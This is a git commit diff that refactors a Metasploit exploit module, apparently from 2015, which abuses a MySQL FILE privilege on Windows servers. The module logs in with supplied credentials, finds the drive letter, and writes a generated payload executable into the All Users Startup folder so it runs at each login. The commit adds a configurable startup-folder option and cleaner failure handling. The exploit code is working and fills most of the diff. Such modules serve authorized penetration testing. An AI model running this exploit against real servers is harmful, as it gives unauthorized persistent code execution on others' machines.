Do code cleanup

jvazquez-r7 · jvazquez-r7 · commit 2c633e403efc · 2015-01-09T12:07:59.000-06:00
diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb
@@ -18,7 +18,8 @@ def initialize(info = {})
         This module takes advantage of a file privilege misconfiguration problem
         specifically against Windows MySQL servers. This module abuses the FILE
         privilege to write a payload to Microsoft's All Users Start Up directory
-        which will execute every time a user logs in.
+        which will execute every time a user logs in. The default All Users Start
+        Up directory used by the module is Windows 7 friendly.
       },
       'Author'         =>
         [
@@ -49,7 +50,8 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('USERNAME', [ true, 'The username to authenticate as']),
-        OptString.new('PASSWORD', [ true, 'The password to authenticate with'])
+        OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
+        OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
       ])
   end
 
@@ -84,7 +86,7 @@ def query(q)
 
   def is_windows?
     r = query("SELECT @@version_compile_os;")
-    return (r[0]['@@version_compile_os'] =~ /^Win/) ? true : false
+    r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
   end
 
   def get_drive_letter
@@ -103,38 +105,35 @@ def exploit
     print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
     begin
       m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
-      return if not m
     rescue RbMysql::AccessDeniedError
-      print_error("#{peer} - Access denied.")
-      return
+      fail_with(Failure::NoAccess, "#{peer} - Access denied")
     end
 
+    fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m
+
     unless is_windows?
-      print_error("#{peer} - Remote host isn't Windows.")
-      return
+      fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
     end
 
     begin
       drive = get_drive_letter
-      return unless drive
     rescue RbMysql::ParseError
-      print_error("Could not determine drive name")
-      return
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
     end
 
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive
+
     exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
-    dest     = "#{drive}:/programdata/microsoft/windows/start menu/programs/startup/#{exe_name}"
+    dest     = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
     exe      = generate_payload_exe
 
     print_status("#{peer} - Uploading to '#{dest}'")
     begin
       upload_file(exe, dest)
-      register_file_for_cleanup("#{dest}")
     rescue RbMysql::AccessDeniedError
-      print_error("#{peer} - No permission to write. I blame kc :-)")
-      return
+      fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
     end
-
+    register_file_for_cleanup("#{dest}")
   end
 
 end
